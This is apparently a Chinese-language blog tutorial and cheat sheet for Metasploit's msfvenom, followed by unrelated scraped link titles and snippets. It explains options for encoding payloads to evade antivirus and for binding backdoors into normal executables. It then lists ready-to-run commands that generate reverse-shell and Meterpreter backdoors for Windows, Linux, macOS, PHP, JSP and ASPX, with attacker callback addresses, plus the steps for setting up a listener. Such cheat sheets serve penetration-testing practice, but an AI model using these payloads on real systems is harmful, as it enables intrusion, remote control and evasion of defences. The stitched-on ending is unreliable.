参数总结

1. –p (- -payload-options)

添加载荷payload。

载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!

(- -payload-options 列出payload选项)

2. –l

查看所有payload encoder nops。

3. –f (- -help-formats)

输出文件格式。

(- -help-formats 列出所有文件格式)

Executable formats:

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war

Transform formats:

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

4. –e

编码免杀。后面跟编码方式,使用的编码方式

5. –a (- -platform – -help-platforms)

选择架构平台

x86 | x64 | x86_64

Platforms:

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

6. –o

文件输出。跟文件名 如shell.exe

7. –s

生成payload的最大长度,就是文件大小。

8. –b

避免使用的字符 例如:不使用 ‘0f’。注意引号的编码格式,windows和linux的引号不一样,混用会导致报错

9. –i

编码次数。后面接数次,表示编码的次数

10. –c

添加自己的shellcode。

11. –x | -k

捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

12.LHOST LPORT

用于指定后门返回机器的ip和发送的端口,相应的需要在攻击机上监听对应端口

13. -l

-l, --list <type> 列出指定类型的所有模块 类型包括: payloads, encoders, nops, platforms, archs, formats, all

14. -n

-n, --nopsled <length> 在payload上添加指定长度的nop指令

15. -t

设定读取有效载荷的秒数,后接数字

16. -h

帮助

17. -v

用于在特定输出格式下指定参数

目录结构

所有的msf的模块都在这个文件夹中

/usr/share/metasploit-framework/modules/

打开后可以看到

ls /usr/share/metasploit-framework/modules/
auxiliary  encoders  evasion  exploits  nops  payloads  post

有这么些目录

其中encoder是用于编码免杀的模块

常用的是其中x86/shikata_ga_nai文件

而payloads则是有效载荷用于靶机和攻击机建立联系

其中有三种类型

Singles- Singles非常小,旨在建立某种通讯,然后进入下一阶段。例如,只是创建一个用户。

Staged- 是一种攻击者用来将更大的文件上传到沦陷的系统的payload。

Stages- Stages是由Stagers模块下载的payload组件。各种payload stages提供高级功能,没有规模限制,如Meterpreter和VNCInjection。

而msfvenom使用的是singles文件夹中的payloads

官方帮助

-l, --list           <type>              列出指定类型的所有模块 类型包括: payloads, encoders, nops, platforms, archs, formats, all-p, --payload   <payload>       指定需要使用的payload(有效载荷)(--list payloads得到payload列表,--list-options得到指定payload的参数)                                                    如果需要使用自定义的payload,请使用'-'或者stdin指定--list-options                     列出指定payload的标准,高级和规避选项  例如:msfvenom -p generic/shell_bind_tcp --list-options                                                                 将列出shell_bind_tcp这个payload的各种选项信息-f, --format        <format>        指定输出格式(使用 --list formats 列出所有的格式)-e, --encoding   <encoder>     要使用的编码(使用 --list encoders 列出所有的编码) 用于编码加密--smallest                           使用所有可用的编码器生成尽可能小的有效负载-a, --arch          <arch>            指定payload的目标CPU架构(使用 --list archs 列出所有的CPU架构)--platform    <platform>      指定payload的目标操作系统平台(使用 --list platforms 列出所有的操作系统平台)-o, --out            <path>            将payload保存到文件中-b, --bad-chars  <list>             指定不使用的字符集 例如:不使用'\x00\xff'这两个字符-n, --nopsled     <length>        在payload上添加指定长度的nop指令-s, --space        <length>        设定payload的最大长度    即生成的文件大小--encoder-space <length> 设定编码payload的最大长度(默认为-s的值)-i, --iterations     <count>         对payload进行编码的次数-c, --add-code    <path>           指定一个自己的win32 shellcode文件 -x, --template      <path>          指定一个可执行程序 将payload捆绑其中 例如:原先有个正常文件normal.exe 通过此选项把payload捆绑到这个程序上面-k, --keep                                  针对-x中的捆绑程序 将创建新线程执行payload 一般情况-x -k选项一起使用-v, --var-name     <value>         指定用于某些输出格式的自定义变量名称-t, --timeout         <second>      从STDIN读取有效负载时等待的秒数(默认为30, 0为禁用)-h, --help                                    查看帮助

常用后门总结

msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=10.10.16.2 LPORT=4444msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jspmsfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met.aspxmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windowsmsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p osx``/x86/shell_reverse_tcp` `LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

meterpreter的payloads

当你在加载payloads时使用了msf的payloads时,就代表你需要使用msf来监听这个payloads返回的shell

使用方法

打开msf
run msfdb使用 exploit模块
use exploit/multi/handler设置payloads
注意选择你在编译msfvenom时使用的payload
set payload window/meterpreter/reverse_tcp设置本机地址和端口
set lhost 192.168.1.1
set lport 4444开始攻击
exploit或者run

Msfvenom使用指南相关推荐

  1. MSF:Web 后门

    Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP.ASP.NET.PHP.JSP代码等.由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得 ...

  2. Termux 速成指南

    Termux 速成指南 前置 大侠需要趁手的兵器 sl top figlet cmatrix fish toilet w3m python termux-ubuntu(root) wifite(roo ...

  3. [2023最新]美少妇Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南

    模块含义 auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等. encoders:编码工具,用于躲过入侵检测和过滤系统. exploit:主要包括了 ...

  4. PowerShell攻击指南

    文章目录 一:PowerShell简介 1.1:基本概念 1.2:执行策略与绕过 1.3:常用命令 二:PowerSploit 2.1:PowerSploit安装 2.2:PowerSploit攻击实 ...

  5. 远控免杀专题文章(2)-msfvenom隐藏的参数

    本专题文章导航 1.远控免杀专题文章(1)-基础篇: 远控免杀专题文章(1)-基础篇 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些 ...

  6. OSCP考试指南————考试要求详情

    OSCP 认证考试模拟私有 VPN 中的实时网络,其中包含少量易受攻击的机器. 您有 23 小时 45 分钟的时间完成考试. 这意味着如果您的考试在北京标准时间 09:00 开始,您的考试将在第二天北 ...

  7. 超详细中文预训练模型ERNIE使用指南-源码

    作者 | 高开远,上海交通大学,自然语言处理研究方向 最近在工作上处理的都是中文语料,也尝试了一些最近放出来的预训练模型(ERNIE,BERT-CHINESE,WWM-BERT-CHINESE),比对 ...

  8. 入门指南目录页 -PaddlePaddle 飞桨 入门指南 FAQ合集-深度学习问题

    入门指南目录页 -PaddlePaddle 飞桨 入门指南 FAQ合集 GT_Zhang关注 0.1012019.08.01 18:43:34字数 1,874阅读 795 Hi,欢迎各位来自Paddl ...

  9. ASIC设计-终极指南

    ASIC设计-终极指南 ASIC Design – The Ultimate Guide ASIC设计-终极指南 ASICs代表特定于应用的集成电路,指的是针对特定应用而设计的半导体解决方案,与其他解 ...

最新文章

  1. yum源无法安装mysql_Centos7上使用官方YUM源安装Mysql
  2. vi和vim的基础使用
  3. Java自动切表_java_Mybatis自动创建表和更新表结构,最近有小伙伴问我mybatis有没有 - phpStudy...
  4. 网易严选宣布退出双11?
  5. 数列分块入门 4(LibreOj-6280)
  6. java字符串定义_java字符串基本概念
  7. 【??链表】LeetCode 92. Reverse Linked List II
  8. CRM客户管理系统源码,基于ThinkPHP开发
  9. Feign远程调用导包出现灵异事件
  10. sql server 存储过程中 SET NOCOUNT ON是什么意思?
  11. EasyGBS主子码流都为H.265时,切换出现花屏如何解决?
  12. 数据库标准语言SQL(六)——单表查询(二)
  13. linux进程的查看和查找 ps命令解析
  14. 字符串水题——相对分子质量
  15. C语言编程中void什么意思,程序设计中遇到的void到底是什么意思
  16. 方程组通解的参数向量形式、基本变量和自由变量
  17. 最新 ICCV | 35个GAN应用主题梳理,最全GAN生成对抗论文汇总
  18. 关于HBulider,mui框架入手可行性
  19. 充电速度公式_充电电池充电时间计算方法
  20. 赢在未来 | 升级营销模式,蚓链让企业业绩增长N倍

热门文章

  1. 浏览器主页被2345劫持解决
  2. SQL Server中如何给主键添加主键约束
  3. 使用美国国立医学图书馆编辑的最新版Index Medicus中医学主题词表(MeSH)
  4. 战争教育策略游戏 MiracleGame,开启新阶段重塑生态和玩法
  5. python实时显示图片_任何显示来自Cam的实时图像的快速Python GUI
  6. centos 7 安装mysql 8.0 详细教程
  7. SQL Server 数据库实验课第九周——第六章总结
  8. PPT保存为超高清图片
  9. mysql daemon failed to start._MySQL Daemon failed to start错误解决办法
  10. 汽车企业数字化转型成熟度评估模型研究